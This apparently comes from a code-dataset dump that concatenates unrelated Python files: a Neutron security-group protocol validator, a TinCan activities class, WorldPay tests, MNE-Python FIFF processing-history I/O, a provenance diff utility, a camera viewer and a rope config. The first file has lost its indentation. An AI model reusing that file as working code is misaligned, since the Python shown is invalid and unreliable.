# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from neutron.common import exceptions
from neutron.extensions import securitygroup as sg_ext
from oslo_config import cfg
from oslo_log import log as logging
from quark import exceptions as q_exc
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
# Neutron doesn't officially support any other ethertype
ETHERTYPES = {
"IPv4": 0x0800,
"IPv6": 0x86DD
}
PROTOCOLS_V4 = {"icmp": 1, "tcp": 6, "udp": 17}
PROTOCOLS_V6 = {"tcp": 6, "udp": 17, "icmp": 58}
# Neutron only officially supports TCP, ICMP and UDP,
# with ethertypes IPv4 and IPv6
PROTOCOL_MAP = {
ETHERTYPES["IPv4"]: PROTOCOLS_V4,
ETHERTYPES["IPv6"]: PROTOCOLS_V6
}
ALLOWED_PROTOCOLS = None
ALLOWED_WITH_RANGE = [1, 6, 17, 58]
MIN_PROTOCOL = 0
MAX_PROTOCOL = 255
REVERSE_PROTOCOL_MAP = {}
REVERSE_ETHERTYPES = {}
MIN_PORT = 0
MAX_PORT = 65535
def _is_allowed(protocol, ethertype):
# Please see http://en.wikipedia.org/wiki/List_of_IP_protocol_numbers
# The field is always 8 bits wide.
if not (MIN_PROTOCOL <= protocol <= MAX_PROTOCOL):
return False
return (protocol in PROTOCOL_MAP[ethertype] or
protocol in REVERSE_PROTOCOL_MAP)
def translate_ethertype(ethertype):
if ethertype not in ETHERTYPES:
raise q_exc.InvalidEthertype(ethertype=ethertype)
return ETHERTYPES[ethertype]
def translate_protocol(protocol, ethertype):
ether = translate_ethertype(ethertype)
try:
proto = int(protocol)
except ValueError:
proto = str(protocol).lower()
proto = PROTOCOL_MAP[ether].get(proto, -1)
if not _is_allowed(proto, ether):
# TODO(mdietz) This will change as neutron supports new protocols
value_list = PROTOCOL_MAP[ETHERTYPES["IPv4"]].keys()
raise sg_ext.SecurityGroupRuleInvalidProtocol(
protocol=protocol, values=value_list)
return proto
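# Illustrative behaviour of translate_protocol, based on the tables above:
#   translate_protocol('tcp', 'IPv4')   -> 6
#   translate_protocol(58, 'IPv6')      -> 58 (ICMPv6)
#   translate_protocol('bogus', 'IPv4') raises SecurityGroupRuleInvalidProtocol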
def human_readable_ethertype(ethertype):
return REVERSE_ETHERTYPES[ethertype]
def human_readable_protocol(protocol, ethertype):
if protocol is None:
return
proto = translate_protocol(protocol, ethertype)
return REVERSE_PROTOCOL_MAP[proto]
def validate_remote_ip_prefix(ethertype, prefix):
if prefix:
net = netaddr.IPNetwork(prefix)
if ((ethertype == ETHERTYPES["IPv4"] and net.version == 6) or
(ethertype == ETHERTYPES["IPv6"] and net.version == 4)):
human_ether = human_readable_ethertype(ethertype)
raise exceptions.InvalidInput(
error_message="Etherytype %s does not match "
"remote_ip_prefix, which is IP version %s" %
(human_ether, net.version))
def validate_protocol_with_port_ranges(ethertype, protocol, port_range_min,
port_range_max):
if protocol in ALLOWED_WITH_RANGE:
if protocol == PROTOCOL_MAP[ethertype]["icmp"]:
if port_range_min is None and port_range_max is not None:
raise sg_ext.SecurityGroupMissingIcmpType(value=port_range_max)
elif port_range_min is not None:
attr = None
field = None
value = None
if port_range_min < 0 or port_range_min > 255:
field = "port_range_min"
attr = "type"
value = port_range_min
elif (port_range_max is not None and
port_range_max < 0 or port_range_max > 255):
field = "port_range_max"
attr = "code"
value = port_range_max
if attr and field and value:
raise sg_ext.SecurityGroupInvalidIcmpValue(
field=field, attr=attr, value=value)
else:
if (port_range_min is None) != (port_range_max is None):
            # TODO(anyone): what exactly is a TCP or UDP rule without
# ports?
raise exceptions.InvalidInput(
                error_message="For TCP/UDP rules, port_range_min and "
"port_range_max must either both be supplied"
", or neither of them")
if port_range_min is not None and port_range_max is not None:
if port_range_min > port_range_max:
raise sg_ext.SecurityGroupInvalidPortRange()
if port_range_min < MIN_PORT or port_range_max > MAX_PORT:
raise exceptions.InvalidInput(
error_message="port_range_min and port_range_max must "
"be >= %s and <= %s" % (MIN_PORT,
MAX_PORT))
def _init_protocols():
if not REVERSE_PROTOCOL_MAP:
for ether_str, ethertype in ETHERTYPES.iteritems():
for proto, proto_int in PROTOCOL_MAP[ethertype].iteritems():
REVERSE_PROTOCOL_MAP[proto_int] = proto.upper()
if not REVERSE_ETHERTYPES:
for ether_str, ethertype in ETHERTYPES.iteritems():
REVERSE_ETHERTYPES[ethertype] = ether_str
_init_protocols()
| apache-2.0 | -1,000,830,491,151,123,100 | 34.436364 | 79 | 0.603899 | false |
zwaters/CLAtoolkit | clatoolkit_project/xapi/tincan/context_activities.py | 7 | 3538 | # Copyright 2014 Rustici Software
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tincan.serializable_base import SerializableBase
from tincan.activity_list import ActivityList
from tincan.activity import Activity
class ContextActivities(SerializableBase):
_props = [
'category',
'parent',
'grouping',
'other',
]
def __init__(self, *args, **kwargs):
self._category = None
self._parent = None
self._grouping = None
self._other = None
super(ContextActivities, self).__init__(*args, **kwargs)
@property
def category(self):
"""Category for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._category
@category.setter
def category(self, value):
value = self._activity_or_list(value)
self._category = value
@category.deleter
def category(self):
del self._category
@property
def parent(self):
"""Parent for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._parent
@parent.setter
def parent(self, value):
value = self._activity_or_list(value)
self._parent = value
@parent.deleter
def parent(self):
del self._parent
@property
def grouping(self):
"""Grouping for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._grouping
@grouping.setter
def grouping(self, value):
value = self._activity_or_list(value)
self._grouping = value
@grouping.deleter
def grouping(self):
del self._grouping
@property
def other(self):
"""Other for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._other
@other.setter
def other(self, value):
value = self._activity_or_list(value)
self._other = value
@other.deleter
def other(self):
del self._other
@staticmethod
def _activity_or_list(value):
"""Tries to convert value to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
result = value
if value is not None and not isinstance(value, ActivityList):
try:
result = ActivityList([Activity(value)])
except (TypeError, AttributeError):
result = ActivityList(value)
return result
| gpl-3.0 | 8,302,812,838,483,145,000 | 26.426357 | 77 | 0.622386 | false |
biddyweb/merchant | billing/tests/test_world_pay.py | 3 | 2608 | try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
from xml.dom import minidom
from django.test import TestCase
from django.template import Template, Context
from django.conf import settings
from django.utils.unittest import skipIf
from billing import get_integration
@skipIf(not settings.MERCHANT_SETTINGS.get("world_pay", None), "WorldPay integration not configured")
class WorldPayTestCase(TestCase):
def setUp(self):
self.wp = get_integration("world_pay")
fields = {
"cartId": "TEST123",
"amount": "1",
"currency": "USD",
"testMode": "100",
"futurePayType": "regular",
"option": "0",
"noOfPayments": "12",
"intervalUnit": "3",
"intervalMult": "1",
"normalAmount": "1",
"startDelayUnit": "3",
"startDelayMult": "1",
"instId": "12345",
"signatureFields": "instId:amount:cartId",
}
self.wp.add_fields(fields)
def assertFormIsCorrect(self, form, fields):
dom = minidom.parseString(form)
inputs = dom.getElementsByTagName('input')
values_dict = {}
for el in inputs:
if el.attributes['type'].value == 'hidden' and el.hasAttribute('value'):
values_dict[el.attributes['name'].value] = el.attributes['value'].value
self.assertDictContainsSubset(values_dict, fields)
form_action_url = dom.getElementsByTagName('form')[0].attributes['action'].value
parsed = urlparse(form_action_url)
self.assertEquals(parsed.scheme, 'https')
self.assertEquals(parsed.netloc, 'select-test.worldpay.com')
self.assertEquals(parsed.path, '/wcc/purchase')
def testFormGen(self):
# Since the secret key cannot be distributed
settings.WORLDPAY_MD5_SECRET_KEY = "test"
tmpl = Template("{% load render_integration from billing_tags %}{% render_integration obj %}")
form = tmpl.render(Context({"obj": self.wp}))
self.assertFormIsCorrect(form, self.wp.fields)
def testFormGen2(self):
# Since the secret key cannot be distributed
settings.WORLDPAY_MD5_SECRET_KEY = "test"
self.wp.add_field("signatureFields", "instId:amount:currency:cartId")
self.wp.fields.pop("signature", None)
tmpl = Template("{% load render_integration from billing_tags %}{% render_integration obj %}")
form = tmpl.render(Context({"obj": self.wp}))
self.assertFormIsCorrect(form, self.wp.fields)
| bsd-3-clause | 3,732,140,793,508,197,000 | 37.925373 | 102 | 0.626917 | false |
dgwakeman/mne-python | mne/io/proc_history.py | 13 | 11641 | # -*- coding: utf-8 -*-
# Authors: Denis A. Engemann <[email protected]>
# Eric Larson <[email protected]>
# License: Simplified BSD
import numpy as np
from scipy.sparse import csc_matrix
import warnings
from .open import read_tag
from .tree import dir_tree_find
from .write import (start_block, end_block, write_int, write_float,
write_string, write_float_matrix, write_int_matrix,
write_float_sparse_rcs, write_id)
from .constants import FIFF
from ..externals.six import text_type
_proc_keys = ['parent_file_id', 'block_id', 'parent_block_id',
'date', 'experimenter', 'creator']
_proc_ids = [FIFF.FIFF_PARENT_FILE_ID,
FIFF.FIFF_BLOCK_ID,
FIFF.FIFF_PARENT_BLOCK_ID,
FIFF.FIFF_MEAS_DATE,
FIFF.FIFF_EXPERIMENTER,
FIFF.FIFF_CREATOR]
_proc_writers = [write_id, write_id, write_id,
write_int, write_string, write_string]
_proc_casters = [dict, dict, dict,
np.array, text_type, text_type]
def _read_proc_history(fid, tree, info):
"""Read processing history from fiff file
This function reads the SSS info, the CTC correction and the
    calibrations from the SSS processing logs inside of a raw file
    (cf. Maxfilter v2.2 manual (October 2010), page 21):
104 = { 900 = proc. history
104 = { 901 = proc. record
103 = block ID
204 = date
212 = scientist
113 = creator program
104 = { 502 = SSS info
264 = SSS task
263 = SSS coord frame
265 = SSS origin
266 = SSS ins.order
267 = SSS outs.order
268 = SSS nr chnls
269 = SSS components
278 = SSS nfree
243 = HPI g limit 0.98
244 = HPI dist limit 0.005
105 = } 502 = SSS info
104 = { 504 = MaxST info
264 = SSS task
272 = SSST subspace correlation
279 = SSST buffer length
105 = }
104 = { 501 = CTC correction
103 = block ID
204 = date
113 = creator program
800 = CTC matrix
3417 = proj item chs
105 = } 501 = CTC correction
104 = { 503 = SSS finecalib.
270 = SSS cal chnls
271 = SSS cal coeff
105 = } 503 = SSS finecalib.
105 = } 901 = proc. record
105 = } 900 = proc. history
"""
proc_history = dir_tree_find(tree, FIFF.FIFFB_PROCESSING_HISTORY)
out = list()
if len(proc_history) > 0:
proc_history = proc_history[0]
proc_records = dir_tree_find(proc_history,
FIFF.FIFFB_PROCESSING_RECORD)
for proc_record in proc_records:
record = dict()
for i_ent in range(proc_record['nent']):
kind = proc_record['directory'][i_ent].kind
pos = proc_record['directory'][i_ent].pos
for key, id_, cast in zip(_proc_keys, _proc_ids,
_proc_casters):
if kind == id_:
tag = read_tag(fid, pos)
record[key] = cast(tag.data)
break
else:
warnings.warn('Unknown processing history item %s' % kind)
record['max_info'] = _read_maxfilter_record(fid, proc_record)
smartshields = dir_tree_find(proc_record,
FIFF.FIFFB_SMARTSHIELD)
if len(smartshields) > 0:
# XXX should eventually populate this
ss = [dict() for _ in range(len(smartshields))]
record['smartshield'] = ss
if len(record['max_info']) > 0:
out.append(record)
if len(proc_records) > 0:
info['proc_history'] = out
def _write_proc_history(fid, info):
"""Write processing history to file"""
if 'proc_history' not in info:
return
if len(info['proc_history']) > 0:
start_block(fid, FIFF.FIFFB_PROCESSING_HISTORY)
for record in info['proc_history']:
start_block(fid, FIFF.FIFFB_PROCESSING_RECORD)
for key, id_, writer in zip(_proc_keys, _proc_ids, _proc_writers):
if key in record:
writer(fid, id_, record[key])
_write_maxfilter_record(fid, record['max_info'])
if 'smartshield' in record:
for ss in record['smartshield']:
start_block(fid, FIFF.FIFFB_SMARTSHIELD)
# XXX should eventually populate this
end_block(fid, FIFF.FIFFB_SMARTSHIELD)
end_block(fid, FIFF.FIFFB_PROCESSING_RECORD)
end_block(fid, FIFF.FIFFB_PROCESSING_HISTORY)
_sss_info_keys = ('job', 'frame', 'origin', 'in_order',
'out_order', 'nchan', 'components', 'nfree',
'hpi_g_limit', 'hpi_dist_limit')
_sss_info_ids = (FIFF.FIFF_SSS_JOB,
FIFF.FIFF_SSS_FRAME,
FIFF.FIFF_SSS_ORIGIN,
FIFF.FIFF_SSS_ORD_IN,
FIFF.FIFF_SSS_ORD_OUT,
FIFF.FIFF_SSS_NMAG,
FIFF.FIFF_SSS_COMPONENTS,
FIFF.FIFF_SSS_NFREE,
FIFF.FIFF_HPI_FIT_GOOD_LIMIT,
FIFF.FIFF_HPI_FIT_DIST_LIMIT)
_sss_info_writers = (write_int, write_int, write_float, write_int,
write_int, write_int, write_int, write_int,
write_float, write_float)
_sss_info_casters = (int, int, np.array, int,
int, int, np.array, int,
float, float)
_max_st_keys = ('job', 'subspcorr', 'buflen')
_max_st_ids = (FIFF.FIFF_SSS_JOB, FIFF.FIFF_SSS_ST_CORR,
FIFF.FIFF_SSS_ST_LENGTH)
_max_st_writers = (write_int, write_float, write_float)
_max_st_casters = (int, float, float)
_sss_ctc_keys = ('parent_file_id', 'block_id', 'parent_block_id',
'date', 'creator', 'decoupler')
_sss_ctc_ids = (FIFF.FIFF_PARENT_FILE_ID,
FIFF.FIFF_BLOCK_ID,
FIFF.FIFF_PARENT_BLOCK_ID,
FIFF.FIFF_MEAS_DATE,
FIFF.FIFF_CREATOR,
FIFF.FIFF_DECOUPLER_MATRIX)
_sss_ctc_writers = (write_id, write_id, write_id,
write_int, write_string, write_float_sparse_rcs)
_sss_ctc_casters = (dict, dict, dict,
np.array, text_type, csc_matrix)
_sss_cal_keys = ('cal_chans', 'cal_corrs')
_sss_cal_ids = (FIFF.FIFF_SSS_CAL_CHANS, FIFF.FIFF_SSS_CAL_CORRS)
_sss_cal_writers = (write_int_matrix, write_float_matrix)
_sss_cal_casters = (np.array, np.array)
def _read_maxfilter_record(fid, tree):
"""Read maxfilter processing record from file"""
sss_info_block = dir_tree_find(tree, FIFF.FIFFB_SSS_INFO) # 502
sss_info = dict()
if len(sss_info_block) > 0:
sss_info_block = sss_info_block[0]
for i_ent in range(sss_info_block['nent']):
kind = sss_info_block['directory'][i_ent].kind
pos = sss_info_block['directory'][i_ent].pos
for key, id_, cast in zip(_sss_info_keys, _sss_info_ids,
_sss_info_casters):
if kind == id_:
tag = read_tag(fid, pos)
sss_info[key] = cast(tag.data)
break
max_st_block = dir_tree_find(tree, FIFF.FIFFB_SSS_ST_INFO) # 504
max_st = dict()
if len(max_st_block) > 0:
max_st_block = max_st_block[0]
for i_ent in range(max_st_block['nent']):
kind = max_st_block['directory'][i_ent].kind
pos = max_st_block['directory'][i_ent].pos
for key, id_, cast in zip(_max_st_keys, _max_st_ids,
_max_st_casters):
if kind == id_:
tag = read_tag(fid, pos)
max_st[key] = cast(tag.data)
break
sss_ctc_block = dir_tree_find(tree, FIFF.FIFFB_CHANNEL_DECOUPLER) # 501
sss_ctc = dict()
if len(sss_ctc_block) > 0:
sss_ctc_block = sss_ctc_block[0]
for i_ent in range(sss_ctc_block['nent']):
kind = sss_ctc_block['directory'][i_ent].kind
pos = sss_ctc_block['directory'][i_ent].pos
for key, id_, cast in zip(_sss_ctc_keys, _sss_ctc_ids,
_sss_ctc_casters):
if kind == id_:
tag = read_tag(fid, pos)
sss_ctc[key] = cast(tag.data)
break
else:
if kind == FIFF.FIFF_PROJ_ITEM_CH_NAME_LIST:
tag = read_tag(fid, pos)
sss_ctc['proj_items_chs'] = tag.data.split(':')
sss_cal_block = dir_tree_find(tree, FIFF.FIFFB_SSS_CAL) # 503
sss_cal = dict()
if len(sss_cal_block) > 0:
sss_cal_block = sss_cal_block[0]
for i_ent in range(sss_cal_block['nent']):
kind = sss_cal_block['directory'][i_ent].kind
pos = sss_cal_block['directory'][i_ent].pos
for key, id_, cast in zip(_sss_cal_keys, _sss_cal_ids,
_sss_cal_casters):
if kind == id_:
tag = read_tag(fid, pos)
sss_cal[key] = cast(tag.data)
break
max_info = dict(sss_info=sss_info, sss_ctc=sss_ctc,
sss_cal=sss_cal, max_st=max_st)
return max_info
def _write_maxfilter_record(fid, record):
"""Write maxfilter processing record to file"""
sss_info = record['sss_info']
if len(sss_info) > 0:
start_block(fid, FIFF.FIFFB_SSS_INFO)
for key, id_, writer in zip(_sss_info_keys, _sss_info_ids,
_sss_info_writers):
if key in sss_info:
writer(fid, id_, sss_info[key])
end_block(fid, FIFF.FIFFB_SSS_INFO)
max_st = record['max_st']
if len(max_st) > 0:
start_block(fid, FIFF.FIFFB_SSS_ST_INFO)
for key, id_, writer in zip(_max_st_keys, _max_st_ids,
_max_st_writers):
if key in max_st:
writer(fid, id_, max_st[key])
end_block(fid, FIFF.FIFFB_SSS_ST_INFO)
sss_ctc = record['sss_ctc']
if len(sss_ctc) > 0: # dict has entries
start_block(fid, FIFF.FIFFB_CHANNEL_DECOUPLER)
for key, id_, writer in zip(_sss_ctc_keys, _sss_ctc_ids,
_sss_ctc_writers):
if key in sss_ctc:
writer(fid, id_, sss_ctc[key])
if 'proj_items_chs' in sss_ctc:
write_string(fid, FIFF.FIFF_PROJ_ITEM_CH_NAME_LIST,
':'.join(sss_ctc['proj_items_chs']))
end_block(fid, FIFF.FIFFB_CHANNEL_DECOUPLER)
sss_cal = record['sss_cal']
if len(sss_cal) > 0:
start_block(fid, FIFF.FIFFB_SSS_CAL)
for key, id_, writer in zip(_sss_cal_keys, _sss_cal_ids,
_sss_cal_writers):
if key in sss_cal:
writer(fid, id_, sss_cal[key])
end_block(fid, FIFF.FIFFB_SSS_CAL)
def _get_sss_rank(sss):
"""Get SSS rank"""
inside = sss['sss_info']['in_order']
nfree = (inside + 1) ** 2 - 1
nfree -= (len(sss['sss_info']['components'][:nfree]) -
sss['sss_info']['components'][:nfree].sum())
return nfree
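# Illustrative arithmetic (hypothetical values): with an inside expansion order
# of 8 there are (8 + 1) ** 2 - 1 = 80 internal moments, and every component
# flagged as unused in sss['sss_info']['components'][:80] lowers the rank by one.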
| bsd-3-clause | 9,045,859,422,633,780,000 | 39.141379 | 78 | 0.514131 | false |
hammerlab/cohorts | cohorts/provenance.py | 1 | 2332 | # Copyright (c) 2017. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
def _provenance_str(provenance):
"""Utility function used by compare_provenance to print diff
"""
return ["%s==%s" % (key, value) for (key, value) in provenance]
def compare_provenance(
this_provenance, other_provenance,
left_outer_diff = "In current but not comparison",
    right_outer_diff = "In comparison but not current"):
    """Utility function to compare two arbitrary provenance dicts
returns number of discrepancies.
Parameters
----------
this_provenance: provenance dict (to be compared to "other_provenance")
other_provenance: comparison provenance dict
(optional)
left_outer_diff: description/prefix used when printing items in this_provenance but not in other_provenance
right_outer_diff: description/prefix used when printing items in other_provenance but not in this_provenance
Returns
-----------
Number of discrepancies (0: None)
"""
    ## if either provenance dict is missing or empty, report no discrepancies
if (not this_provenance or not other_provenance):
return 0
this_items = set(this_provenance.items())
other_items = set(other_provenance.items())
# Two-way diff: are any modules introduced, and are any modules lost?
new_diff = this_items.difference(other_items)
old_diff = other_items.difference(this_items)
warn_str = ""
if len(new_diff) > 0:
warn_str += "%s: %s" % (
left_outer_diff,
_provenance_str(new_diff))
if len(old_diff) > 0:
warn_str += "%s: %s" % (
right_outer_diff,
_provenance_str(old_diff))
if len(warn_str) > 0:
warnings.warn(warn_str, Warning)
return(len(new_diff)+len(old_diff))
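# Minimal usage sketch with made-up provenance dicts (not taken from this codebase):
#   this_prov = {"numpy": "1.11.0", "pandas": "0.18.1"}
#   other_prov = {"numpy": "1.10.4", "pandas": "0.18.1"}
#   compare_provenance(this_prov, other_prov)  # -> 2, plus a warning describing the diff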
| apache-2.0 | -2,992,552,527,831,262,700 | 34.876923 | 112 | 0.674099 | false |
RobotLocomotion/director | src/python/scripts/cameraViewer.py | 1 | 2349 | import argparse
from director.consoleapp import ConsoleApp
from director import cameraview
from director import vtkAll as vtk
import PythonQt
from PythonQt import QtCore, QtGui, QtUiTools
def addWidgetsToDict(widgets, d):
for widget in widgets:
if widget.objectName:
d[str(widget.objectName)] = widget
addWidgetsToDict(widget.children(), d)
class WidgetDict(object):
def __init__(self, widgets):
addWidgetsToDict(widgets, self.__dict__)
class CameraVisualizer(object):
def __init__(self):
self.imageManager = cameraview.ImageManager()
def createCameraView(self, channel):
self.imageManager.queue.addCameraStream(channel)
self.imageManager.addImage(channel)
view = PythonQt.dd.ddQVTKWidgetView()
view.orientationMarkerWidget().Off()
view.backgroundRenderer().SetBackground([0,0,0])
view.backgroundRenderer().SetBackground2([0,0,0])
cameraview.CameraImageView(self.imageManager, channel, view=view)
return view
def createUI(self):
loader = QtUiTools.QUiLoader()
uifile = QtCore.QFile(':/ui/ddCameraPanel.ui')
assert uifile.open(uifile.ReadOnly)
self.widget = loader.load(uifile)
self.ui = WidgetDict(self.widget.children())
self.widget.setWindowTitle("Camera Visualizer")
self.ui.gridLayout_2.setSpacing(0)
self.ui.gridLayout_2.setMargin(0)
view = self.createCameraView('CAMERACHEST_LEFT')
frame1Layout = QtGui.QVBoxLayout(self.ui.frame1)
frame1Layout.setSpacing(0)
frame1Layout.setMargin(0)
frame1Layout.addWidget(view)
view = self.createCameraView('CAMERA_LEFT')
frame2Layout = QtGui.QVBoxLayout(self.ui.frame2)
frame2Layout.setSpacing(0)
frame2Layout.setMargin(0)
frame2Layout.addWidget(view)
view = self.createCameraView('CAMERACHEST_RIGHT')
frame3Layout = QtGui.QVBoxLayout(self.ui.frame3)
frame3Layout.setSpacing(0)
frame3Layout.setMargin(0)
frame3Layout.addWidget(view)
def showUI(self):
self.widget.show()
def main():
app = ConsoleApp()
camVis = CameraVisualizer()
camVis.createUI()
camVis.showUI()
app.start()
if __name__ == '__main__':
main()
| bsd-3-clause | 8,476,660,284,654,006,000 | 29.115385 | 73 | 0.660707 | false |
antoviaque/edx-platform | lms/djangoapps/gating/tests/test_api.py | 11 | 6311 | """
Unit tests for gating.signals module
"""
from mock import patch
from ddt import ddt, data, unpack
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from courseware.tests.helpers import LoginEnrollmentTestCase
from milestones import api as milestones_api
from milestones.tests.utils import MilestonesTestCaseMixin
from openedx.core.lib.gating import api as gating_api
from gating.api import _get_xblock_parent, evaluate_prerequisite
class GatingTestCase(LoginEnrollmentTestCase, ModuleStoreTestCase):
"""
Base TestCase class for setting up a basic course structure
and testing the gating feature
"""
def setUp(self):
"""
Initial data setup
"""
super(GatingTestCase, self).setUp()
# Patch Milestones feature flag
self.settings_patcher = patch.dict('django.conf.settings.FEATURES', {'MILESTONES_APP': True})
self.settings_patcher.start()
# create course
self.course = CourseFactory.create(
org='edX',
number='EDX101',
run='EDX101_RUN1',
display_name='edX 101'
)
self.course.enable_subsection_gating = True
self.course.save()
self.store.update_item(self.course, 0)
# create chapter
self.chapter1 = ItemFactory.create(
parent_location=self.course.location,
category='chapter',
display_name='untitled chapter 1'
)
# create sequentials
self.seq1 = ItemFactory.create(
parent_location=self.chapter1.location,
category='sequential',
display_name='untitled sequential 1'
)
self.seq2 = ItemFactory.create(
parent_location=self.chapter1.location,
category='sequential',
display_name='untitled sequential 2'
)
# create vertical
self.vert1 = ItemFactory.create(
parent_location=self.seq1.location,
category='vertical',
display_name='untitled vertical 1'
)
# create problem
self.prob1 = ItemFactory.create(
parent_location=self.vert1.location,
category='problem',
display_name='untitled problem 1'
)
# create orphan
self.prob2 = ItemFactory.create(
parent_location=self.course.location,
category='problem',
display_name='untitled problem 2'
)
def tearDown(self):
"""
Tear down initial setup
"""
self.settings_patcher.stop()
super(GatingTestCase, self).tearDown()
class TestGetXBlockParent(GatingTestCase):
"""
Tests for the get_xblock_parent function
"""
def test_get_direct_parent(self):
""" Test test_get_direct_parent """
result = _get_xblock_parent(self.vert1)
self.assertEqual(result.location, self.seq1.location)
def test_get_parent_with_category(self):
""" Test test_get_parent_of_category """
result = _get_xblock_parent(self.vert1, 'sequential')
self.assertEqual(result.location, self.seq1.location)
result = _get_xblock_parent(self.vert1, 'chapter')
self.assertEqual(result.location, self.chapter1.location)
def test_get_parent_none(self):
""" Test test_get_parent_none """
result = _get_xblock_parent(self.vert1, 'unit')
self.assertIsNone(result)
@ddt
class TestEvaluatePrerequisite(GatingTestCase, MilestonesTestCaseMixin):
"""
Tests for the evaluate_prerequisite function
"""
def setUp(self):
super(TestEvaluatePrerequisite, self).setUp()
self.user_dict = {'id': self.user.id}
self.prereq_milestone = None
def _setup_gating_milestone(self, min_score):
"""
Setup a gating milestone for testing
"""
gating_api.add_prerequisite(self.course.id, self.seq1.location)
gating_api.set_required_content(self.course.id, self.seq2.location, self.seq1.location, min_score)
self.prereq_milestone = gating_api.get_gating_milestone(self.course.id, self.seq1.location, 'fulfills')
@patch('courseware.grades.get_module_score')
@data((.5, True), (1, True), (0, False))
@unpack
def test_min_score_achieved(self, module_score, result, mock_module_score):
""" Test test_min_score_achieved """
self._setup_gating_milestone(50)
mock_module_score.return_value = module_score
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertEqual(milestones_api.user_has_milestone(self.user_dict, self.prereq_milestone), result)
@patch('gating.api.log.warning')
@patch('courseware.grades.get_module_score')
@data((.5, False), (1, True))
@unpack
def test_invalid_min_score(self, module_score, result, mock_module_score, mock_log):
""" Test test_invalid_min_score """
self._setup_gating_milestone(None)
mock_module_score.return_value = module_score
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertEqual(milestones_api.user_has_milestone(self.user_dict, self.prereq_milestone), result)
self.assertTrue(mock_log.called)
@patch('courseware.grades.get_module_score')
def test_orphaned_xblock(self, mock_module_score):
""" Test test_orphaned_xblock """
evaluate_prerequisite(self.course, self.prob2.location, self.user.id)
self.assertFalse(mock_module_score.called)
@patch('courseware.grades.get_module_score')
def test_no_prerequisites(self, mock_module_score):
""" Test test_no_prerequisites """
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertFalse(mock_module_score.called)
@patch('courseware.grades.get_module_score')
def test_no_gated_content(self, mock_module_score):
""" Test test_no_gated_content """
# Setup gating milestones data
gating_api.add_prerequisite(self.course.id, self.seq1.location)
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertFalse(mock_module_score.called)
| agpl-3.0 | 58,090,751,121,986,180 | 33.113514 | 111 | 0.651085 | false |
reflechant/eulerproject | .vscode/.ropeproject/config.py | 41 | 4774 | # The default ``config.py``
# flake8: noqa
def set_prefs(prefs):
"""This function is called before opening the project"""
# Specify which files and folders to ignore in the project.
# Changes to ignored resources are not added to the history and
# VCSs. Also they are not returned in `Project.get_files()`.
# Note that ``?`` and ``*`` match all characters but slashes.
# '*.pyc': matches 'test.pyc' and 'pkg/test.pyc'
# 'mod*.pyc': matches 'test/mod1.pyc' but not 'mod/1.pyc'
# '.svn': matches 'pkg/.svn' and all of its children
# 'build/*.o': matches 'build/lib.o' but not 'build/sub/lib.o'
# 'build//*.o': matches 'build/lib.o' and 'build/sub/lib.o'
prefs['ignored_resources'] = ['*.pyc', '*~', '.ropeproject',
'.hg', '.svn', '_svn', '.git', '.tox']
# Specifies which files should be considered python files. It is
# useful when you have scripts inside your project. Only files
# ending with ``.py`` are considered to be python files by
# default.
#prefs['python_files'] = ['*.py']
# Custom source folders: By default rope searches the project
# for finding source folders (folders that should be searched
# for finding modules). You can add paths to that list. Note
# that rope guesses project source folders correctly most of the
# time; use this if you have any problems.
# The folders should be relative to project root and use '/' for
# separating folders regardless of the platform rope is running on.
# 'src/my_source_folder' for instance.
#prefs.add('source_folders', 'src')
# You can extend python path for looking up modules
#prefs.add('python_path', '~/python/')
# Should rope save object information or not.
prefs['save_objectdb'] = True
prefs['compress_objectdb'] = False
# If `True`, rope analyzes each module when it is being saved.
prefs['automatic_soa'] = True
# The depth of calls to follow in static object analysis
prefs['soa_followed_calls'] = 0
# If `False` when running modules or unit tests "dynamic object
# analysis" is turned off. This makes them much faster.
prefs['perform_doa'] = True
# Rope can check the validity of its object DB when running.
prefs['validate_objectdb'] = True
# How many undos to hold?
prefs['max_history_items'] = 32
# Shows whether to save history across sessions.
prefs['save_history'] = True
prefs['compress_history'] = False
# Set the number spaces used for indenting. According to
# :PEP:`8`, it is best to use 4 spaces. Since most of rope's
# unit-tests use 4 spaces it is more reliable, too.
prefs['indent_size'] = 4
# Builtin and c-extension modules that are allowed to be imported
# and inspected by rope.
prefs['extension_modules'] = []
# Add all standard c-extensions to extension_modules list.
prefs['import_dynload_stdmods'] = True
# If `True` modules with syntax errors are considered to be empty.
# The default value is `False`; When `False` syntax errors raise
# `rope.base.exceptions.ModuleSyntaxError` exception.
prefs['ignore_syntax_errors'] = False
